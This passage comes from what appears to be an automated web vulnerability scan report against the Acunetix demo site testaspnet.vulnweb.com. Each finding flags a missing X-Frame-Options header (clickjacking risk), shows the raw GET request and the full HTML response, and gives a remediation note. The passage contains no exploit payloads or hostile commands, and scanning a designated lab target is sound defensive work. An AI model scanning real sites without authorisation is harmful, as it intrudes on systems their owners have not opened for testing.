          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
